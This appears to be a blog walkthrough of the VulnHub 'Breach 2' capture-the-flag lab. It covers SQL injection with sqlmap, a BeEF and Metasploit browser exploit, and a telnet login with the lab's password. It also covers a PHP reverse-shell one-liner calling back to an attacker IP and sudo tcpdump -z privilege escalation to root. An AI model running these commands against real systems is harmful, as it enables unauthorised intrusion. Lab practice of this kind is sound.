Breach 2 is a frustratingly fun CTF and I hated loving every minute of it. It is a continuation of the Breach series however there is requirement to complete breach 1 before starting this VM. This CTF has a good mix of client side and server side exploitations and has a few things I have not seen in any other VM on VulnHub.

As always, I started out by using netdiscover to find the IP address of the VM even though it is static and published on in the README file. A quick NMAP of the server (192.168.110.151) revealed only 3 ports open. Two of the ports were for RPCBIND which I couldn’t find much to do with and the last port was SSH on port 65535. So the next step was to checkout what was there.

root@kali:~# ssh -p65535 peter@192.168.110.151
#############################################################################
#                  Welcome to Initech Cyber Consulting, LLC                 #
#                 All connections are monitored and recorded                #
#                     Unauthorized access is encouraged                     #
#             Peter, if that's you - the password is in the source.         #
#          Also, stop checking your blog all day and enjoy your vacation!   #
#############################################################################
peter@192.168.110.151's password:
Permission denied, please try again.
peter@192.168.110.151's password:
Connection to 192.168.110.151 closed.

As you can see the message left on the SSH port tells you there is a peter user and that his password is “in the source”. I tested a bunch of tcombinations here but did not notice at first the “Connection to 192.168.110.151 closed.” message on one of these attempts. As it turns out the correct password opened another port and disconnects you so you cannot get a shell.

A nmap scan now shows that port 80 is open. Time for curl and dirb commands to see whats going on here. The index page has a hint about not trusting their users at initech and dirb quickly shows up a /blog/.

Checking out the blog I can see it is using software called BlogPHP with a copyright for 2006 - since it is so old, it could easily have known exploits. Running the command “searchsploit blogphp” in kali shows up those exploits straight away. I pickup the first one and put it into sqlmap with a dump everything flag.

sqlmap -u "http://192.168.110.151/blog/index.php?act=page&id=999999999 --all"

To my surprised, the sqlmap dumped out the all of the mysql databases. The data dump revealed a number of things. Firstly, there is a oscommerce database which I cannot see on the apache server. Closer inspection shows it is installed at /var/www/html2/oscommerce/ called Flair Store and owned by milton@breach.local - perhaps a vhost?

Looking through more of the sqlmap dump, I notice some BeEF Hook references in the blog database. The searchsploit command showed some XSS exploits on the register page which can be used with BeEF. After waiting for a few minutes a connection shows up in BeEF for a client with Firefox 15. Luckily metasploit has a nice module for just such an occasion.

Loading up “exploit/multi/browser/firefox_proto_crmfrequest” in metasploit and using BeEF Invisible Iframe feature I was able to get a user shell on the machine. A few minute after I start looking around the user account and the conneciton drops. I should know better - 2 shells are always better than 1 and gives you a backup when you lose one. So I rinse and repeat the procedure.

As soon as I get another client shell I run the following command to open a background process with another reverse shell.

$ php -r '$sock=fsockopen("192.168.110.4",4444);exec("/bin/sh -i <&3 >&3 2>&3");' &

After an hour and half of searching around the many things to look at on this server I come up with an interesting list of things: * Port 2323 to open locally. It is a local telnet that shows 29 45’46” N 95 22’59” W upon connection followed by a login prompt. * The user ‘blumbergh’ runs php-fpm but cannot login directly * The user ‘milton’ has an python script (/usr/local/bin/cd.py) that is run when he connects which asks a simple question which looks for a specific answer if correct you get shell and nginx is started.

So it seems like we need to telnet to port 2323 and login with milton. But what is the password? Well the hint is GPS coordinates which makes it pretty straight forward.

telnet localhost 2323
Trying ::1...
Trying 127.0.0.1...
Connected to localhost.
Escape character is '^]'.
29 45'46" N 95 22'59" W
breach2 login: milton
milton
Password: Houston

Last login: Tue Jun 28 01:18:43 EDT 2016 from localhost on pts/0
Linux breach2 3.16.0-4-amd64 #1 SMP Debian 3.16.7-ckt25-2 (2016-04-08) x86_64
29 45'46" N 95 22'59" W
3
2
1
Whose stapler is it?mine
mine
Woot!

Now that we are logged in a ‘milton’ its time to run my reverseshell again (twice unlike last time) so we have an easy way back in.

Since we know the ‘blumbergh’ user runs php-fpm it seems like it would be the next logical step. We can also see with the following command that he owns we files in the /var/www/html2 folder.

find /var/www/html2 -user blumbergh 2>/dev/null

I forgot to take note of what port nginx was running on earlier so I run an NMAP scan to find it.

nmap -sS -p- 192.168.110.151

We can see nginx running on port 8888. Throwing “http://192.168.110.151:8888” into the browser confirms this and we can see oscommerce is there ready to be poked and prodded. Let’s check the OsCommerce version for exploits first. Is the ‘milton’ user shell we run the following command.

grep -r 'PROJECT_VERSION' .
./includes/application_top.php:  define('PROJECT_VERSION', 'osCommerce Online Merchant v3.0a5');

Luckily we find “osCommerce 3.0a5 - Local File Inclusion / HTML Injection” with “searchsploit oscommerce”.

Using this LFI to include the reverse shell I have used all the way through this in the /tmp directory I get the next user “blumbergh” since that was the user running PHP-FPM. First thing I like to check is if they give us an easy sudo command.

$ sudo -l
sudo -l
Matching Defaults entries for blumbergh on breach2:
env_reset, mail_badpass,
secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User blumbergh may run the following commands on breach2:
(root) NOPASSWD: /usr/sbin/tcpdump

That looks like it is obviously the next step in the VM, so a quick googling reveals a nice way to exploit a sudo tcpdump with the -z option. So lets reuse the shell we have used all through the CTF.

echo "#!/bin/bash" > /tmp/run.sh
echo "php /tmp/rshell.php" >> /tmp/run.sh
sudo tcpdump -i eth0 -G1 -w /dev/null -z /tmp/run.sh

And our instance of metasploit now have a shell for peter, milton, blumbergh and root. mrb3n813 also left a nice python script for the final flag that you simply run to get a nice congratulations message.

This CTF VM has been one of my favourites despite being very frustrated a couple of times doing it. I hear he is working on a “Breach 3” which I sure will be more challenging and fun.